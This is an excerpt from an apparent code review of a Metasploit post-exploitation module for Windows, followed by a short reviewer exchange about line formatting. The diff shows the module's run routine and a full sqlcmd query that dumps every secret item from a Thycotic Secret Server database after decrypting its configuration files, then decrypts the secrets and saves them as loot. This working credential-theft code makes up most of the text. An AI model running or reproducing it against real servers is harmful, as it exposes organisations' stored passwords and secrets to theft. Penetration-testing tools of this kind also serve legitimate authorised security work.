modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb

```diff
@@ -0,0 +1,449 @@
+  end
+
+  def result_header_row
+    'SecretID,LastModifiedDate,Active,SecretType,SecretName,FieldName,Plaintext,Plaintext2'
+  end
+
+  def run
+    print_status('Validating target ...')
+    ss_web_path = get_secretserver_config
+    print_status('Decrypt database.config ...')
+    init_thycotic_db(ss_web_path)
+    print_status('Decrypt encryption.config ...')
+    init_thycotic_encryption(ss_web_path)
+    print_status('Init SQL client ...')
+    init_sql
+    csv = dump_thycotic_db
+    total_rows = csv.count
+    fail_with(Msf::Exploit::Failure::NoTarget, 'No rows in import file CSV dataset') unless total_rows > 0
+    print_good("#{total_rows} rows loaded, #{@ss_total_secrets} unique SecretIDs")
+    encrypted_data = csv.to_s.delete("\000")
+    p = store_loot('ss_enc', 'CSV', rhost, encrypted_data, "#{@ss_db_name}.csv", 'Encrypted Database Dump')
+    print_good("Encrypted Secret Server Database Dump: #{p}")
+    return if loot_only
+
+    result_rows = decrypt_thycotic_db(csv)
+    fail_with(Msf::Exploit::Failure::NoTarget, 'Filed to decrypt CSV dataset') unless result_rows
+    total_result_rows = result_rows.count - 1 # Do not count header row
+    total_result_secrets = result_rows['SecretID'].uniq.count - 1
+    if @ss_processed_rows == @ss_failed_rows || total_result_rows <= 0
+      fail_with(Msf::Exploit::Failure::Unknown, 'No rows could be processed')
+    elsif @ss_failed_rows > 0
+      print_warning("#{@ss_processed_rows} rows processed (#{@ss_failed_rows} rows failed)")
+    else
+      print_good("#{@ss_processed_rows} rows processed")
+    end
+    total_records = @ss_decrypted_rows + @ss_plaintext_rows
+    print_status("#{total_records} rows recovered: #{@ss_plaintext_rows} plaintext, #{@ss_decrypted_rows} decrypted (#{@ss_blank_rows} blank)")
+    decrypted_data = result_rows.to_s.delete("\000")
+    print_status("#{total_result_rows} rows written (#{@ss_blank_rows} blank rows withheld)")
+    print_good("#{total_result_secrets} unique SecretID records recovered")
+    p = store_loot('ss_dec', 'CSV', rhost, decrypted_data, "#{@ss_db_name}.csv", 'Decrypted Database Dump')
+    print_good("Decrypted Secret Server Database Dump: #{p}")
+  end
+
+  def dump_thycotic_db
+    sql_cmd = "#{@sql_client} -d \"#{@ss_db_name}\" -S #{@ss_db_instance_path} -U \"#{@ss_db_user}\" -P \"#{@ss_db_pass}\" -Q \"SET NOCOUNT ON;SELECT s.SecretID,s.LastModifiedDate,s.Active,CONVERT(VARBINARY(256),t.SecretTypeName) SecretType,CONVERT(VARBINARY(256),s.SecretName) SecretName,i.IsEncrypted,i.IsSalted,i.Use256Key,CONVERT(VARBINARY(256),f.SecretFieldName) SecretFieldName,s.[Key],s.IvMEK,i.ItemValue,i.ItemValue2,i.IV FROM
+tbSecretItem AS i JOIN tbSecret AS s ON (s.SecretID=i.SecretID) JOIN tbSecretField AS f ON (i.SecretFieldID=f.SecretFieldID) JOIN tbSecretType AS t ON (s.SecretTypeId=t.SecretTypeID)\" -h-1 -s\",\" -w 65535 -W -I"
```

Comment:
Anyway we could perhaps split this across lines? This is quite hard to read in the code.

Reply:
@gwillcox-r7 I'm terrible at doing text blocking correctly (so I usually don't try) however I did take a stab at this - hopefully this looks better?